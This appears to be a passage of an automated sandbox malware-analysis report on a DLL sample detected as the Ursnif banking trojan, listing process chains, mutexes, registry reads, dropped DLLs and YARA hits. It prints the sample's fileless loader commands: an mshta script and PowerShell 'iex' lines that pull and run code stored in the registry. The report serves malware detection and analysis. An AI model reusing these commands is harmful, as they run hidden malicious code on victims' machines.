Source: C:\Windows\System32\control.exe Code function: 30_2_00265E3C 30_2_00265E3C
Source: C:\Windows\System32\control.exe Code function: 30_2_0024FEE4 30_2_0024FEE4
Source: C:\Windows\System32\control.exe Code function: 30_2_00250EF4 30_2_00250EF4
Source: C:\Windows\System32\control.exe Code function: 30_2_0026A6C8 30_2_0026A6C8
Source: C:\Windows\System32\control.exe Code function: 30_2_0025AF34 30_2_0025AF34
Source: C:\Windows\System32\control.exe Code function: 30_2_00257F68 30_2_00257F68
Source: C:\Windows\System32\control.exe Code function: 30_2_0025EF74 30_2_0025EF74
Source: C:\Windows\System32\control.exe Code function: 30_2_00244744 30_2_00244744
PE file does not import any functions
Source: fedhsvoj.dll.29.dr Static PE information: No import functions for PE file found
Source: jqkof1ka.dll.32.dr Static PE information: No import functions for PE file found
Source: vbpfsg54.dll.36.dr Static PE information: No import functions for PE file found
Source: senxb4p4.dll.23.dr Static PE information: No import functions for PE file found
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Uses 32bit PE files
Source: worVoBJYGD.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: classification engine Classification label: mal100.troj.evad.winDLL@41/36@9/2
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0313D325 CloseHandle,CloseHandle,CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,CloseHandle,Thread32Next,CloseHandle, 0_2_0313D325
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20210803 Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1460:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{6256731B-5962-E467-F3B6-9D58D74A210C}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4948:120:WilError_01
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{767DCAC1-5D56-1864-970A-E1CCBBDEA5C0}
Source: C:\Windows\SysWOW64\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{523EEBAD-89C9-54C5-A3A6-CDC8873A517C}
Source: C:\Windows\System32\loaddll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{0A0A9822-E171-CC61-BBDE-A5C01FF2A9F4}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{DA77943D-71E5-1CA0-CBAE-35102FC23944}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0w25flno.lby.ps1 Jump to behavior
Source: worVoBJYGD.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\System32\mshta.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\loaddll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\loaddll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\worVoBJYGD.dll,Chartthird
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\worVoBJYGD.dll'
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\worVoBJYGD.dll',#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\worVoBJYGD.dll,Chartthird
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\worVoBJYGD.dll',#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\worVoBJYGD.dll,Heavybaby
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\worVoBJYGD.dll,Right
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Nl6y='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Nl6y).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Pksv='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Pksv).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\senxb4p4\senxb4p4.cmdline'
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESE546.tmp' 'c:\Users\user\AppData\Local\Temp\senxb4p4\CSCD728609DA3104BA4891CE07457BF77DE.TMP'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\fedhsvoj\fedhsvoj.cmdline'
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES419.tmp' 'c:\Users\user\AppData\Local\Temp\fedhsvoj\CSC2C7CB35724FE4D03B8B83A389D1E5FE.TMP'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jqkof1ka\jqkof1ka.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCE3.tmp' 'c:\Users\user\AppData\Local\Temp\jqkof1ka\CSCA3035077FC7544A28C7D2FD8A94650.TMP'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vbpfsg54\vbpfsg54.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES278F.tmp' 'c:\Users\user\AppData\Local\Temp\vbpfsg54\CSCC3210ABFD4B4742A7EBA7934EB0D0.TMP'
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\worVoBJYGD.dll',#1 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\worVoBJYGD.dll,Chartthird Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\worVoBJYGD.dll,Heavybaby Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\worVoBJYGD.dll,Right Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\worVoBJYGD.dll',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\senxb4p4\senxb4p4.cmdline' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\fedhsvoj\fedhsvoj.cmdline' Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESE546.tmp' 'c:\Users\user\AppData\Local\Temp\senxb4p4\CSCD728609DA3104BA4891CE07457BF77DE.TMP'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jqkof1ka\jqkof1ka.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vbpfsg54\vbpfsg54.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES419.tmp' 'c:\Users\user\AppData\Local\Temp\fedhsvoj\CSC2C7CB35724FE4D03B8B83A389D1E5FE.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCE3.tmp' 'c:\Users\user\AppData\Local\Temp\jqkof1ka\CSCA3035077FC7544A28C7D2FD8A94650.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES278F.tmp' 'c:\Users\user\AppData\Local\Temp\vbpfsg54\CSCC3210ABFD4B4742A7EBA7934EB0D0.TMP'
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: worVoBJYGD.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000017.00000002.429129001.000001ED7C9D0000.00000002.00000001.sdmp, csc.exe, 0000001D.00000002.443954090.000002400C710000.00000002.00000001.sdmp, csc.exe, 00000020.00000002.449751054.000001317AE50000.00000002.00000001.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\fedhsvoj\fedhsvoj.pdb source: powershell.exe, 00000013.00000002.561042649.0000020484316000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.436321416.0000000004EC0000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.474646332.0000000005840000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.436321416.0000000004EC0000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.474646332.0000000005840000.00000004.00000001.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\senxb4p4\senxb4p4.pdbXP source: powershell.exe, 00000013.00000002.561042649.0000020484316000.00000004.00000001.sdmp
Source: Binary string: c:\922\exact-round\Example\horse\in.pdb source: loaddll32.exe, 00000000.00000002.504641313.000000006DDD0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.507786068.000000006DDD0000.00000002.00020000.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\fedhsvoj\fedhsvoj.pdbXP source: powershell.exe, 00000013.00000002.561042649.0000020484316000.00000004.00000001.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\senxb4p4\senxb4p4.pdb source: powershell.exe, 00000013.00000002.560986791.00000204842CD000.00000004.00000001.sdmp

Data Obfuscation:

barindex
Suspicious powershell command line found
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) Jump to behavior
Compiles C# or VB.Net code
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\senxb4p4\senxb4p4.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\fedhsvoj\fedhsvoj.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jqkof1ka\jqkof1ka.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vbpfsg54\vbpfsg54.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\senxb4p4\senxb4p4.cmdline' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\fedhsvoj\fedhsvoj.cmdline' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jqkof1ka\jqkof1ka.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vbpfsg54\vbpfsg54.cmdline'
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD81D62 LoadLibraryA,GetProcAddress, 0_2_6DD81D62
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD82263 push ecx; ret 0_2_6DD82273
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD82210 push ecx; ret 0_2_6DD82219
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0314528F push ecx; ret 0_2_0314529F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00D97AB0 push ecx; ret 4_2_00D97AB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00D97E1F push ecx; ret 4_2_00D97E2F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00D9B1DE push esp; iretd 4_2_00D9B26C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_05384EE0 push ecx; ret 4_2_05384EE9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0538528F push ecx; ret 4_2_0538529F
Source: C:\Windows\System32\control.exe Code function: 30_2_0025C4ED push 3B000001h; retf 30_2_0025C4F2

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\jqkof1ka\jqkof1ka.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\fedhsvoj\fedhsvoj.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\senxb4p4\senxb4p4.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\vbpfsg54\vbpfsg54.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.397556594.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374227278.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.434124521.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.534765366.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.434060838.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.397622522.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.397589601.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.451828519.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.434180314.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.433841942.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.451943735.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.434086354.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.433993641.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374321927.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.381487289.0000000003D4C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.400741331.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.406917672.0000000004DDC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.397430655.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374277769.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.451905542.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374345773.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374301760.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.459171611.0000000005828000.00000004.00000040.sdmp, type: MEMORY
